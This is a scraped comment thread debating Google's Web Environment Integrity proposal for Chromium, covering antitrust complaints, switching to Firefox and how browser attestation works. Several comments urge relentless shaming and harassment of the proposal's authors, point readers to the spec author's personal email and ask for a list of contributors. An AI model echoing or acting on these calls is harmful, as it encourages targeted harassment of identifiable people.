(1375) Google is already pushing WEI into Chromium
1375 points 6 days ago by topshelf in 10000th position
github.com | Estimated reading time – 19 minutes | comments | anchor
1375 points 6 days ago by topshelf in 10000th position
github.com | Estimated reading time – 19 minutes | comments | anchor
Why do you think they don't have consensus or approval from all the people that matter? This is far too big for that. Google, Apple, Microsoft, Cloudflare, etc, are all working together on this. Governments will like it for 'security', and 99% of users won't care.
It's small, but here's a real actionable item that you can do to help:
Put a gentle 'Use Firefox' (or any other non-Chromium-based browser) message on your website. It doesn't have to be in-your-face, just something small.
I've taken my own advice and added it to my own website: https://geeklaunch.io/
(It only appears on Chromium-based browsers.)
We can slowly turn the tide, little by little.
i find this comment a bit funny given that you use googletagmanager on your website :)
I like this idea, but has Mozilla said anything about their position in all of this? I'm a Firefox user, but I haven't felt great about Mozilla in quite a while. I'd love to know they are on the right side of this issue before I start promoting them like this.
> It only appears on Chromium-based browsers.
Small anecdote: I am not sure how you're detecting the browser, but this note still appears in Orion (webkit-based browser) while it does not in Safari. Persists even when I change user agent explicitly to Firefox or Safari.
For people who want to put something like this, here is the code snippet:
<span id='browser' class='hidden'>
This website is designed for <a target='_blank' rel='noopener noreferrer' href='https://firefox.com/'>Firefox</a>, a web browser that respects your privacy.
</span>
<script>
if (window.chrome) {
document.getElementById('browser').className = '';
}
</script>
Class .hidden must hide the element somehow, in this case I do: .hidden { display: none; }
I don't think most people know the difference between Chrome or Firefox and if they can still use websites they use with that change, they just won't bother.
Even if you explain what is the difference, 99% they'll forget the next day.
It's just pointless. With this kind of overreach, only government intervention and regulation can help. Google is not something you can go against with your proverbial wallet - they are too big.
The issue with that is that most people here will only have their own website or product, which is already aimed at more tech-savvy people, who will already have made a conscious decision to use Firefox, Chrome, or whichever browser they prefer.
But we / this site only represents a small percentage. 85% market share means there are hundreds of millions, if not billions of users that would have to switch to make any kind of impact.
And you can't do that without being a very large company with an operating system or the most popular search engine or other ways to constantly tell people to use your browser, no matter how good or privacy conscious or whatever your own is.
If this isn't the straw that breaks the camel's back, there is never going to be one.
Google needs to be broken up.
They own the browser market. They own the web (through Adwords). They own Search. They own mobile. They own most of the video sharing market with 2.5 billion monthly annual users. They own a good chunk of email with 1.2 billion monthly annual users.
They have amassed an incomprehensible amount of power and influence over humanity and they have proven repeatedly that they are willing to use that power to the detriment of humanity and to entrench themselves further.
Google needs to be broken up.
> Google needs to be broken up.
Not going to happen. Rationally there should be broad political consensus about cutting Google back to size: from rabid libertarians worshiping the miraculous abundance generated by 'competition and free markets' to bleeding-heart socialists keen on pushing back corporate power as the root of all evil.
Alas, these political categories no longer have any meaning. The US political system has mutated into something else (the messenger being a horned man) which will probably require some time to properly characterize and name using terminology that is appropriate to use in good company.
So the fate of Google will be more shaped by actions of external entities than as part of US regulatory efforts. Powerful countries that antagonize the US are simply degoogling and creating their own copycat panopticons.
The question is what will be the course of action of powerful countries that are alies of the US (i.e. Europe and a few others). Will they accept that their digital society will be feudal in nature because the broken US political system cannot deliver on even basic responsibilities?
Don't forget, increasingly transport, you won't be able to get a taxi in SF soon without being monitored / tracked by Google.
What would it mean for Chrome to be spun-off into a separate business? How would it survive?
Google broke itself up in 2015. What are you even asking for here?
Chrome and Android are open source, and there are several forks of both thriving in the ecosystem. Yeah it would be cool if there was a decent open source alternative to GMail and Drive, but no one else seems to have figured out how to get the incentives right for something like that.
Why should the US break up an asset like Google? Would be completely self defeating. This isn't like standard oil or at&t, that mostly had influence and market share inside the US. It would basically be handing power to foreign competitors who would pounce at the opportunity
And I'm not American so it's not even some sort of patriotic comment. If Europe , or anywhere else, had a Google sized Behemoth, they wouldn't mess with it no matter how 'anti tech' they might seem now. If anything they are anti tech because they don't want foreign big tech to have massive influence over them. You'd bet they wouldn't cripple big tech if they were European. On the other hand, as long as they are American that massive power is a feature, not a bug for the US government.
The reaction to Tiktok is a good example of how nationalism/geopolitics shape the reaction to big tech, which is why google is probably safe.
> Google needs to be broken up.
To make it explicit: the only way this happens is by Americans voting for it. The FTC has been more active on anti-trust issues in the past two years than at any time in the past 30. That's a direct result of the 2020 election. Elections matter.
That would be a desirable action but look what happen in the end of 90s to Microsoft. It was about to be broken up and in the very end it didn't. They become dormant and polite only to strike back some 10 years ago with Windows 10, its telemetry, ads and cloud services which are being pushed onto users whether they like or not. And somehow, no regulators decided to step in to clean up this company's behavior - everyone seems to be ok with what MS is doing. Whether it's the US or EU. I take that the business and lobbing goes extremely well in both markets.
And because of this, I don't believe that the US is able to break Google or the other flagship companies despite of reasons existing for such action.
There's a saying, on the internet nobody knows you're a dog.
WEI is part of a broader movement to make this false - more generally to make an internet where we know you are a human staring at a screen
It turns out having dogs (or more commonly programs and scripts) on the internet is not profitable and not good for business, so corporations want to take dogs off their websites by finding clever ways to attest that a real human with eyeballs is clicking with hands and staring at ads.
Support dog rights. Don't allow for a WEI-dominated web.
The whole narrative about WEI 'proving' you're a human is completely false (and I'd argue a ruse). It only proves you're using a sanctioned OS and browser binary. It does nothing to stop robots being wired-up to devices w/ emulated inputs.
In fact, WEI will make it easier to use a robot w/ a sanctioned software stack since, hey, it's a 'human' per WEI.
The web stopped being open when W3C accepted EME. Now that effectively Google IS the web, they don't even have fake attempting to convince anybody and will just turn the web into another proprietary technology.
> The web stopped being open when W3C accepted EME
The web was more open when to play those videos you had to use a proprietary Flash or Silverlight plugin?
And also, to switch back to Firefox
And what happens when website owners decide supporting Firefox is not worth it?
Firefox' killer feature on mobile is that it supports uBlock Origin, while Chrome doesn't. Browsing the web without it is horrible -- the screen covered in popups with tiny Xes. There's a decent fraction of the time that you can't even read the content underneath. Firefox solves all that.
However.
Try opening any article from The Guardian on Firefox mobile. Even a good phone will start feeling sluggish and laggy and weird. An old phone will just go catatonic, get hot, and OOM the whole browser.
Surely this is partly The Guardian's fault. (Should it surprise me that the paper that poses 'left' for the upper middle class is also incompatible with any but corporate software from Big Tech?)
But it's also definitely Firefox' fault too. Something is wrong with the implementation. If Chrome can render these sites smoothly, Firefox should be able to.
Firefox would only have an excuse if Google had some special APIs on Android, or were doing something to actively sabotage the Firefox experience. I'm not willing to get quite that paranoid yet.
There are some other browsers, but who the hell wrote them? How much of what you see in the app store is legitimate open source, and how much is OSS that some opportunist put their own trackers into? I'd love a good alternative, but I don't see a lot worth trusting.
So it's Firefox for most things, and Chrome when Firefox gets all slow and laggy. Or, Firefox for news articles, and Chrome for businesses' websites.
Exactly. I use Firefox for everything. It renders all the pages fine and is speedy enough so that I never question its performance. But even if it had some issues, those were minor compared to the danger the web is in now.
I suppose this is more important.
When the usage metrics drop for Chrome based browsers they would need to start respecting other users, instead of just ignoring them.
Currently they can just ignore the users and continue as they do. As the rest would not hint a dent on their bottom line.
We detached this subthread from https://news.ycombinator.com/item?id=36876504 since that thread broke the site guidelines and this one didn't.
Who has been mismanaged for at least a decade and depends on Google to pay their bills..
I'm a FF user since the early 00's and Firefox will mostly not go away because Google has an interest in using it against monopoly accusations but the reality is bleak..
And the reality is these people ( Google in this case ) are so far removed from any moral compass about the Web ( at least what most people here think of 'the Web' ) that it's near impossible to do anything about it. These companies are huge and from top to bottom there are certain groups that are hired guns to do a job, no matter what 'job' it is, they'll do it, achieve those KPIs, get promoted, get paid. Even for their own detriment in the future, it doesn't matter. Big money now, screw the rest.
Btw, this is how every big company operated since forever, the only 'news' here is the disproportionate impact their acts do to the World due to their huge size and influence.
I don't see how this will end the 'free web.' No publisher will be forced to use DRM. Anyone can still create a website and make it accessible to anyone for free with an internet connection.
If certain publishers want to require ads to view their content, that seems like their prerogative.
Until Google Search starts punishing sites that don't require a trusted execution environment...
I'm surprised to see so many people in this thread saying 'write a strongly worded letter!' (or something along those lines), and so few saying we need to build a better browser without this crap in it, which has been the traditionally successful answer to attempts to privatize the Web.
Before doing this, Google was careful to make it as difficult as possible to build a replacement for Chrome. Apple struggles to make Safari capable. Mozilla struggles to make Chrome-first websites work in Firefox. Building a new browser is a Herculean task.
Pragmatically, I'm hoping that a Chromium spinoff like Brave (or Edge!? Could MS be the hero we need?) will turn the privacy switches on, WEI off, and get enough market share to make WEI infeasible.
Since this is basically just obfuscation shouldn't it be possible to break it? Heck it's not even DRM so it doesn't fall under the protection of the DMCA.
I realise all the negative effects if this starts becoming a thing, but could someone explain how is it they propose to technically enforce this 'signed browser binary' requirement? What's stopping me from writing my browser to submit false info? Any encryption keys or hashes present in the 'certified' binaries can be extracted (the binary after all needs access to it to use it, right?).
The only way this has a slightest chance of working is in connection with trusted hardware. Microsoft has been trying hard to push tpm on everyone and failed. What makes them think they'll succeed?
Edge is based on Chromium now, has been for years. Wouldn't be a leap to have TPM enforcement here too.
Publishing an implementation of a proposed web specification is how all web standards are created or evolve. The same thing happens with WebGPU, WASM, and many before them. Usually with a prefix (ms-, moz-, webkit-,...) and/or locked behind a config setting before standardization.
What is different this time other than it being a feature that is considered user-hostile?
That's not to say we shouldn't oppose this feature, I just wouldn't be up in arms about an implementation existing.
> That's not to say we shouldn't oppose this feature, I just wouldn't be up in arms about an implementation existing.
People aren't up in arms about the process by which web standards become accepted; they are up in arms about this standard moving forward at all because of its dangerous implications for the web and it's outright user-hostility.
I wonder if any web servers or web apps have started to block Chrome users yet.
Another tame article in The Register:
https://www.theregister.com/2023/07/25/google_web_environmen...
Despite the spec's half-baked state, the blowback last week was swift – in the form of a flood of largely critical comments posted to the WEI GitHub repository, and abuse directed at the authors of the proposal. The Google devs' response was to limit comment posting to those who had previously contributed to the repo and to post a Code of Conduct document as a reminder to be civil.
The usual way to deal with opposition these days.
If you want to protest the knife we're driving into your stomach, you can do so, but we need to see credentials and civility.
Limiting posting and asking for civility is the only way for individuals to meaningfully engage with even a mere thousand others. Nothing about the human mind was meant for social internet at the scale of the internet, where there are more distinct voices than you have heartbeats in a lifetime.
Also worth noting that this locks reactions (thumbs up, hearts, etc.) - providing plausible deniability that 'only a small number of people raised concerns about specificTopicX.' Journalists should be more aware of this!
On a separate note, for journalists and others who wish to communicate with the spec's author directly, his public website (which lists a personal email) is one of the other repos on the Github profile under which the specification was published. It's painfully absurd that he wrote this sentence in 2022 [0]:
> I decided to make this an app in the end. This is where my costs started wracking up. I had to pay for a second hand macbook pro to build an iOS app. Apple's strategy with this is obvious, and it clearly works, but it still greatly upsets me that I couldn't just build an app with my linux laptop. If I want the app to persist for longer than a month, and to make it easy for friends to install, I had to pay $99 for a developer account. Come on Apple, I know you want people to use the app story but this is just a little cruel. I basically have to pay $99 a year now just to keep using my little app.
[0] https://benwiser.com/blog/I-just-spent-%C2%A3700-to-have-my-...
"Please be civil while we destroy the web as we know it. We also put earplugs in, just in case."
As wonderful as it has been to have a platform that the entire world is on at once, I'm beginning to conclude that the only way to get back to the web as we knew it is to go back to the days when only a small, geeky subset of the population spent time on here. Back then it wasn't worth it to create massive amounts of garbage content in order to serve ads to unwary search engine users—there weren't enough of us to make money off of!
I think it's time to establish a successor to the web that we can once again call home. This doesn't mean we need to give up on the web or stop using it—it can run in parallel to the mainstream, a niche home for hackers and techies and people who care about freedom. It needs to be simple, like Gemini [0], but also have enough interactive features to enable old-school social apps like HN or the old Reddit. It should have a spec and a governance process that discourages rapid changes—we've learned from hard experience that more features does not mean better.
I realize this sounds like a cop out, and that getting people to use such a thing in sufficient numbers would be extremely difficult. But I'm pretty convinced at this point that the web as we knew it will never come back unless there's a reset—unless we create a new niche tech that isn't big enough for corporations to want to take over.
>I realize this sounds like a cop out, and that getting people to use such a thing in sufficient numbers would be extremely difficult.
In the last few days browsing Fediverse platforms I prefer the smaller communities for that old internet spirit anyway.
What you can do:
- stop using Chrome
- do not implement web DRM on your personal site
- do not use providers like Cloudflare if they will support web DRM
- maybe add a warning on your personal site for Chrome users
Maybe something else?
One problem I find is that all that we do is in a bubble. I can convince a dozen like-minded people about the dangers and actions to take. However, the vast majority of the population is completely oblivious to all this and are negligently complicit in enabling bad behavior. This sort of things need to be discussed on the streets and in mainstream media (not tech media) for regular people to become aware. Remember that during the previous browser wars (IE vs Netscape), it was much more in the open and a lot more people knew.
Get the Wikipedia Foundation on board and make sure the wikipedia or other big mediawiki hosts refuse to show any kind of content if such feature is detected in the browser.
Also, if you're a distro mantainer, configure apache and nginx defaults to make this is the default behaviour.
Even better: instead of redirecting to any wall of text with a long explanation of the political and technical reasons of this choice, just display a big, loud 'ERROR' message stating that their browser is unsupported due to the presence of this module, and a small tutorial on how to deactivate it from the about:config page, if available.
I do not agree with configuring apache and nginx to do that by default, unless WEI would somehow prevent a server that doesn't understand it from working properly (as far as I can tell, that is not the case). (A system administrator could still change the configuration; this is only about the default setting.)
However, I think the other stuff that you had mentioned would be OK.
Furthermore, a distro maintainer could configure clients by default to disable WEI (or to not include client programs that have WEI).
Is adding a feature-flag really the same as pushing the feature into the browser immediately? It can easily just be part of a SWE needing the flag in place in order to continue work without impacting anything else, even if that thing never ever launches.
In general Google engineers don't tend to work on branches, especially long-running ones. Incremental small code reviews are the expectation. The general process would be to stick things securely behind flags and continue development without turning it on, even if it never ever launches.
Not saying this work should be done -- it shouldn't -- but code being pushed is not the same as 'we're going to make this happen tomorrow, no matter what.'
Yes, because a feature flag shows intent to implement it before any real discussion have taken place with privacy and non-corporate security advocates.
> Is adding a feature-flag really the same as pushing the feature into the browser immediately?
'Don't mind me guys, I'm barely boiling the frog.'
When was the last time you heard Google or anything Google-related backing down from getting their paws in deeper? It's no longer a fallacy when there's a sign next to the slippery slope.
> Is adding a feature-flag really the same as pushing the feature into the browser immediately? It can easily just be part of a SWE needing the flag in place in order to continue work without impacting anything else, even if that thing never ever launches.
Yes, because that's a such anti-consumer issue. It shouldn't exist in the first place, it should never be merged to master. There's no reason to not keep it on a separate branch if you don't intend to use it.
Companies don't usually make a habit of having their employees work on something they don't intend to pursue.
What you think they push the flag without the intention to make it happen?
Google depends on Adwords. Other revenue streams are minor in comparison. Chromium is the main moat. Android too, of course. ~$15 billion to Apple is another, so protecting all on mobile. With the demise of AICOA, we cannot hope or expect the EU to deliver. In a sense it's simple; folks have to stop using Google search in order to preserve the web, and support those who are trying to preserve it. But I would say that. We are doing what we can.
Break it up. Break them all up. We need more disruption, not this codswallop.
Don't just comment and complain, contact your antitrust authority today:
US:
- https://www.ftc.gov/enforcement/report-antitrust-violation
EU:
- https://competition-policy.ec.europa.eu/antitrust/contact_en
UK:
- https://www.gov.uk/guidance/tell-the-cma-about-a-competition...
India:
I admire your optimism. Don't know about the others, but I'll be surprised if UK one would lift a finger. They are beyond useless.
A customizable form letter would be nice to have, if anyone wants to jump on that. I'm not a great writer in that respect.
Thank you so much for your call to action; just emailed [email protected].
For any experiencing barriers for writing the email, my method is below; Bing Chat generated an excellent email that only needed a bit of editing.
1. Open https://vivaldi.com/blog/googles-new-dangerous-web-environme... page in (ugh) Edge.
2. Open Bing Chat sidebar (top right corner); it auto-summarizes the article.
3: My prompt: Using the that webpage summary, please write a letter reporting Alphabet for antitrust violation. Please include the following [this language is from the ftc.gov site]:
Q: What companies or organizations are engaging in conduct you believe violates the antitrust laws? A: Alphabet
Q: Why do you believe this conduct may have harmed competition in violation of the antitrust laws? A: [use the article]
Q:What is your role in the situation? A: I'm a user of the Firefox browser
[edit: line breaks for readability]
Thanks, just emailed the FTC. It was a bit cathartic and now I don't have to be angry about this for the rest of the day, I'd encourage everyone else to do the same.
I think https://competition-policy.ec.europa.eu/antitrust/procedures... would be better for contacting EU antitrust.
Here you can specifically create new antitrust complaints.
One thing about this that I don't understand is how they intend to validate memory without controlling the entire stack (which we aren't even 1% close to achieving on the desktop). If I poke /dev/mem, does that mean Chrome will have to validate every single byte of it's ram? Or does it rely on having a fully locked down environment (maybe feasible on phones).
Even on Windows, you can do practically anything with a signed driver.
There's just no such thing as verifying a 'secure environment' outside of extremely narrow, controlled scenarios.
Disappointing to see such a 180 on 'don't be evil'.
I'm recommending Mozilla Firefox to all friends and family.
Unfortunately Firefox doesn't have a good UI/UX after all.
The last time I checked, multiple profiles support is somehow half-baked.
I was just able to finally move my wife back to Firefox. Chrome just stopped working on her Mac. Wouldn't pull up a page. Everything else worked.
She's now happily using Firefox with a non-hobbled version of uBlock Origin.
I do, and I keep having those tiring conversations, but it's really hard to get the point across in layman's terms. I have enough friends in tech who stick with Chrome out of convenience instead of just falling back on it in case something actually doesn't work in Firefox. how do I convince tech illiterate people of doing this?
Is anyone else working on alternatives to this web? We're going to want something working before this one becomes a telescreen.
I'm thinking:
- content addressing, not server addressing (to better distribute the hosting load)
- looser coupling between data itself and apps for viewing data (to prevent aesthetics from being used as a heuristic for trustworthiness)
- a native permissionless annotation protocol (p2p trust governs whether annotations appear: if you see an ad, just revoke trust in its author)
- no code execution needed for browsing, fancy features (i.e. the kind of thing you actually need js for) stay optional
I'm curious what design goals other people think are relevant.
I've put barely any thought into it but I think a "localnet" would be better. Your usage is entirely based on calculated geoposition and the userbase is segmented into regions based on user count. More than X0,000 users in any one region and it splits to keep things small. This would be a limitation for hosting content. If you want to send a message out to another person in a different region you'd have to make a deliberate effort to do so and it will be private such as a letter would be.
Idk if that would achieve my goals and honestly I can't plainly state what my goals are. All I know is I get tired of privileged California snobs telling me how things should be in my back 40
There are many arguments against this but not many brought the implications for search engines.
If websites implement this, it will effectively make building a web search engine impossible for new entrants. The current players can whitelist/attest their own clients while categorizing every other scraping clients as bots.
If not for other reasons, I can't see how Google a search company can be allowed to push something that can kill competition using its market dominance in other areas like browsers.
> If not for other reasons, I can't see how Google a search company can be allowed to push something that can kill competition using its market dominance in other areas like browsers.
Because antitrust has been dead for a while. Chrome is a tool to drive people to Google and Google ads and nothing more.
I will say, I did appreciate Microsoft having a browser engine with IE and Edge, even if the former was notoriously a pain, it gave competition in the space. Unfortunately, that's not the case anymore and everything is either Chrome (Blink), Firefox (Gecko), or Safari (WebKit). And it's pretty clear what Chrome has done once that have amassed a dominant market share.
I'm sure there are Googlers who think they're legitimately making the web a safer place, but I think the real reason is pretty clear if you take a birds eye view.
> The current players can whitelist/attest their own clients while categorizing every other scraping clients as bots.
Can't they already do this by having scrapers send plain-old client certificates? Or even just a request header that contains an HMAC of the URL with a shared secret?
Actually, taking a step further back: why does anyone need to scrape their own properties? They can make up an arbitrary backchannel to access that data — just like the one Google uses to populate YouTube results into SERPs. No need to provide a usefully-scrapeable website at all.
Is it possible for them to implement this API in such a way that it will fail 5% of the time or so, making it impossible for websites to deny individuals based on failing attestation?
https://github.com/RupertBenWiser/Web-Environment-Integrity/...
> The current players can whitelist/attest their own clients while categorizing every other scraping clients as bots.
I hadn't really considered this. In a roundabout way, is there a process for this to be rejected on grounds of 'fair use' limitations?
How would this work against scrapers that are based on driven anpproved browser instances, eg. something like Selenium?
This proposal is just so throughly user-hostile that it's impossible to criticise it based on technical grounds. It's not a bad proposal, it's a dangerous, evil and malicious one, so criticising it in details is futile. The whole thing in itself is evil, and it needs to be thrown out. Quietly protesting won't work this time, the goal is to kick up a huge fuss which gets the attention of governments, regulatory bodies and start antitrust proceedings.
Excuse my french but Google can fuck off with their censorship and 'reminder to be civil'. They have truly gone mask off, with the Code of Conducts not reinforcing good practice and a welcoming environment, but just a tool used to suppress dissent.
I've switched to Firefox and I'd recommend everyone else to do so.
As someone that isn't up-to-date on WEI, can someone provide a TLDR of what it does and why it's bad?
> The whole thing in itself is evil, and it needs to be thrown out.
Not only the proposal, but Google itself. Google desperately needs to be broken up.
> This proposal is just so throughly user-hostile that it's impossible to criticise it based on technical grounds. It's not a bad proposal, it's a dangerous, evil and malicious one, so criticising it in details is futile.
I can't agree more strongly. I sat down to write a letter to the FTC, and I can't even articulate my objections because after reading this spec my only response is encompassed in 'WTF is this shit?'. I've worked in my past with members of the Chromium team and I've generally found them competent and well-meaning, and I can't see any amount of well-meaning (and some lack of competence) in this spec proposal. This feels like a shift in the behavior for Google far beyond their existing slow drive to consume everything, to something far more draconian and direct.
Agreed - if anyone else is curious to see Google's 'side' (motivations, technical or otherwise), here's the explainer:
https://github.com/RupertBenWiser/Web-Environment-Integrity/...
It's nakedly user-hostile. A blatant attempt to invert the 'user agent' relationship such that the agent works for the advertiser/corporation/government to spy on the human behind the screen. The way the intro paragraph tries to disguise this as something users need or want is frankly disgusting:
> Users often depend on websites trusting the client environment they run in. This trust may assume that the client environment is honest about certain aspects of itself, keeps user data and intellectual property secure, and is transparent about whether or not a human is using it. This trust is the backbone of the open internet, critical for the safety of user data and for the sustainability of the website's business.
Ugh. Here's a fixed, honest version:
Corporations like Google often depend on advertisers knowing as much as possible about their users. Their revenue may depend on fingerprinting the client environment, tracking their behavior and history, and attesting that a human with sufficient disposable income is behind the keyboard. This personal data mining is the backbone of Google's business model, critical for their continued dominance of the web and for the sustainability of their enormous margins.
How is this feature hostile to Googles users? There is genuine benefit from websites allowing you to do more things via their website (vs their app). Also: fewer/no Captchas, fewer bots on social media
The platforms most people use will see benefits. Apple users apparently already do.
I understand the argument that the open source experience will get worse. But frankly, google.com will still work for you. It will be other websites that make your experience worse.
As someone who is a somewhat new to web technologies, can someone really explain why this is bad? I saw the techical discussions in the PRs made to the WEI repo but it was all super technical that I was not able to understand the arguments made for and against it.
Like any technology, there are both positive and negative aspects of it. The positive take would probably be that this technology is already widely used by iOS and Android apps. People use Apple's AppAttest to e.g. ensure that high scores submitted for a game are from a legitimate copy of the game and not just someone calling the SubmitHighScore API.
But it's absolutely fair to argue that the web operates on a different set of expectations than the Play Store/App Store, and I think the concerns that this will create a second-class citizen status for browsers are totally valid. There's a huge difference in character between 'in order to prevent piracy and ensure ad revenue we are only releasing our app on the Play Store' and 'we are only releasing our web app for Chrome'.
It's like having the "I'm not a robot" button embedded in your web browser.
WEI turns non-compliant browsers into second-class citizens. You're perfectly free to use whatever compliant browser engine and OS combo you like today – but in a world with WEI, you'll have to use Approved Chrome on an Approved OS on Approved Hardware with Approved Signing Keys, or you won't be able to sign into your bank.
It's a change to the browser that gives site-owners the ability to require a positive attestation of non-modification before running. The stated goal of this change is to make it more difficult for end-users to block ads. As the spec states, blocking ads violates the deal you make with content creators to use your attention to ads as a form of payment.
In practice, this will make it harder, but not impossible, to run ad blockers. Now instead of just finding and installing a plugin, you'll have to first find and install a forked browser that implements the attestation as something like 'return true'. This will predictably decrease the number of people blocking ads.
Personally, I don't object to this. The easy solution for most people is simply: don't consume the content. Or pay money instead of watching ads. Content creators, it must be said, also have the option of self-hosting and/or creating content as a hobby rather than a career. As someone who has grown more and more despairing of any paid-for speech, especially by ads, I welcome this change.
Far more troubling is the possibility of attestation for 'important apps' like banking or government. In general this mechanism gives the org a way to prevent you from doing what you want with your data. For example, they can prevent you from scraping data and automating end-user tasks. This takes away your degrees-of-freedom, and using a modified browser will certainly become an actionable offense. In my view this is by far the more troubling aspect of this change, since it take away significant aspects of user autonomy in a context where it matters most.
Technically sophisticated users will note that it's not possible to secure a client, and foolish to try. This misses the point. These changes stochastically change behaviors 'in the large', like a shopping center that offers two lanes in and one lane out, or two escalators in and one out. This represents a net transfer of power from the less powerful to the more powerful, and therefore deserves to be opposed.
EDIT: please don't downvote, but rather reply with your objection.
To put it simple, it makes it possible for service provider to reject providing service to clients not running corporate-owned white-listed clients. Thus making it virtually impossible to create independent clients for such services.
It will be swiftly adopted by well meaning but clueless bank and government clerks who will accidentally use to lock all open hardware, open operating system, open browser users out and mandate you need to purchase at least one locked down corporate device to exist.
It's the trusted computing story all along. Eventually you will need permission to run your code on your own device and such 'unlocked' device will be blocked from accessing any digital infrastructure because it might be otherwise used to breach ToS.
Can someone please explain what this actually is. Without the poetry.
ELI5: Server: Are you a real user capable of viewing ads? Client: Hmmm, not sure. Server: 404
This is about WEI, Web environment integrity. The article below sums it up pretty good.
'The proposal suggests that websites should be able to request an attestation from the browser about its "integrity". Such attestations are to be provided by external agents, which – presumably – examine the browser and its plugins, and issue an approval only if those checks pass.
The attestation is sent back to the website, which can now decide to deny service if the agent did not give approval.' [1]
1. https://interpeer.io/blog/2023/07/google-vs-the-open-web
In other words, websites can now force you to comply with their shitty behaviour in order to allow you access, otherwise you get denided access.
From the spec author, in 2022 [0]:
> I decided to make this an app in the end. This is where my costs started wracking up. I had to pay for a second hand macbook pro to build an iOS app. Apple's strategy with this is obvious, and it clearly works, but it still greatly upsets me that I couldn't just build an app with my linux laptop. If I want the app to persist for longer than a month, and to make it easy for friends to install, I had to pay $99 for a developer account. Come on Apple, I know you want people to use the app story but this is just a little cruel. I basically have to pay $99 a year now just to keep using my little app.
The double-think is absolutely astounding.
[0] https://benwiser.com/blog/I-just-spent-%C2%A3700-to-have-my-...
The guy seems to have deleted most of his social accounts. Clearly he values privacy for himself, just not for everyone else.
This is especially surprising coming from a Linux user who presumably understands the desire to have a device that runs code one can read, write, compile, execute, and share freely and without needing to receive approval from a Big Tech gatekeeper.
I don't think it's double-think, it's just a lack of consequential thinking. I believe the writers of the spec when they say that they just want to be able to see which ad views are real or not. They even lay out some (far too weak) ideas to keep the system from being mandatory and abusable. But they don't realize just how quickly things will go out of hand once the rest of the organization realizes what they have created.
The road to hell is paved with good intentions.
This is a crisis of our own making. You don't want Google taking decisions for the web at large? Then don't let them own 85% of the browser market share. When that's the case they don't need W3C or anything to implement whatever they want, they effectively control the client-side internet.
It's proven that mass marketing works. Tell me how a minority of informed and caring users can avoid on their own that a single large scale bad actor pours millions over millions of dollars to convince the uninformed masses about whatever they want. It even happens in actual elections when some factions use misinformation campaigns to alter the average voter's perception! So not an easy task to solve without help.
One of the things that led to Google's current dominance is folks like us (certainly me, at least) pushing folks to replace their default IE installation with Chrome as soon as they set up a new computer.
I hope, pragmatically, something similar might happen with this: say that Brave (my daily driver) disables WEI in their Chromium build, and a new Chromium-derived browser surges in popularity... like judo, using their own power against them.
In the end, I feel like there is a silver lining to all this. As the world wide web becomes more sanitised with their codes of conduct, corporate censorship, ads, witch hunts, all these limitations - more and more, I hope, would the valuable, interesting bits of it drift to alternative locations.
The internets of old were just that - a place where nerds, freaks, outcasts, and other antisocial personalities congregated. Everything was permitted and everything was possible. Many, myself included, hoped that it would change the world. It didn't - the world is winning again, as everyone can clearly see. Still, I hope that the normalisation of the web might as well create a critical mass of those who just want something more than just a corporate safe space.
I sincerely wish that there is a future where protocols like gemini - stripped from all the visual noise and 'dynamic' features - get a critical mass of useres. If that doesn't happen - as someone who doesn't use any mainstream social media, google and microsoft services, llms and other modern (and some might add - dystopian) stuff - I don't really loose much. There are enough great books for a hundred lifetimes, enough hikes to walk and friends to get blasted with. Maybe it'd even be for the better.
That colourful internet of yore coexisted with doing your banking at a bank. Now, banking has largely moved online and banks have eliminated a lot of their physical locations. Ditto for accessing government services in many countries. The concern here is no longer being able to do important everyday things without using a supported browser, even if a small hobbyist internet for nerds, freaks, and outcasts survived out there.
I feel like I have to repeat this, since so much is at stake here, where it is about the preservation of the web as we know it today, at the peril of having it turned into yet another walled garden:
The only way around the dystopia this will lead to is to constantly and relentlessly shame and even harass all those involved in helping create it. The scolding in the issue tracker of that wretched 'project' shall flow like a river, until the spirit of those pursuing it breaks, and the effort is disbanded.
And once the corporate hydra has regrown its head, repeat. Hopefully, enough practise makes those fighting the dystopia effective enough to one day topple over sponsoring and enabling organisations as a whole, instead of only their little initiatives leading down that path.
Not a pretty thing, but necessary.
Yeah, financial and social pressure is basically the only weapons we have against corporations when regulations don't exist. And honestly, financial pressure doesn't work at this scale or in this case.
All they'll have to do is make a pronouncement of support for some trendy social issue and everything will be forgiven and forgotten. Virtue signaling has turned into the most effective corporate tool for manipulating society into allowing corporations to do almost anything they want. And the public's addiction is so strong that even when this is pointed out and agreed that it is happening, the addiction still must be fed, so corporate sociopathic parasitism on society continues with the joyous approval of society in general.
Indeed. Negotiations have already turned out to be completely ineffective. The next step is war.
Cory Doctorow came up with the phrase 'The War on General-Purpose Computing', which describes the situation perfectly.
Is https://github.com/RupertBenWiser/Web-Environment-Integrity/... the best place to shame?
The battle is already lost legislatively.
Multiple US states, France, Germany and the UK are going to make the web unnavigable unless you type your credit card number or scan your face for age verification in two out of every three sites.
We are going to need to at least try to create ways to secure those credentials in as zero trust model as possible.
(Note that the legislation is a disaster, but it is done. Nobody paid enough attention. It has passed or will pass in weeks.)
It won't do anything. You don't think they've anticipated random angry outbursts going into this? Plus, the people you're harassing are simply implementing a policy that they don't have the power to change.
The only pressure that Google has been shown to consistently respond to is political. Get a couple of senators (... of the right party) to send them a mild rebuke and they will indeed retreat a little (... and try something else later). But that's a lot harder than posting angry comments until the next piece of outrageous news comes along, isn't it?
Has anyone compiled a list of those pushing forward and/or working on WEI?
I don't like Google's grasp on so many vital parts of the web but somehow, it seems like google is actually in trouble.
AI is going to completely change search if it hasn't already, and google is not even close to compete in this space.
Video has some massive competition from the likes of TikTok. Anyway, YouTube isn't the only option on the market.
Gmail is still popular but since google has been pressuring users to pay, it's been easier than ever to find a reason to try another service.
Chromium can always be forked and have some parts removed or added, and as we all know quite a few browsers do this, some are quite popular.
Is google also losing IOS ads like Meta? If they do, that's another reason for alarm for them.
I'm not sure google is in the best position for the future and WEI is not going to be their golden ticket either.
And, if your prediction that web will change actually comes to pass, well then it'll be just another cycle for this space that has changed countless times since the age of dialup. The web is going to change, again and again, but as long as people are still free to set up a server and let the world access it, we can still do what we like with it.
That sounds entirely unhelpful. They can just close the issue tracker + people will obviously just move on. This sounds like the Reddit 'blackout' that did nothing and is already forgotten.
What we really need is for the collective browser vendors to refuse to implement this and, if Chrome pushes forward, to bring Google to court over it. Nothing short of legal intervention is going to help here.
I agree with your overall ideal of free access to information but I disagree that harassment is a necessary or even effective option to push against this. I think the harassment puts us in a category of ineffective, bitter malcontents and that's not what we are.
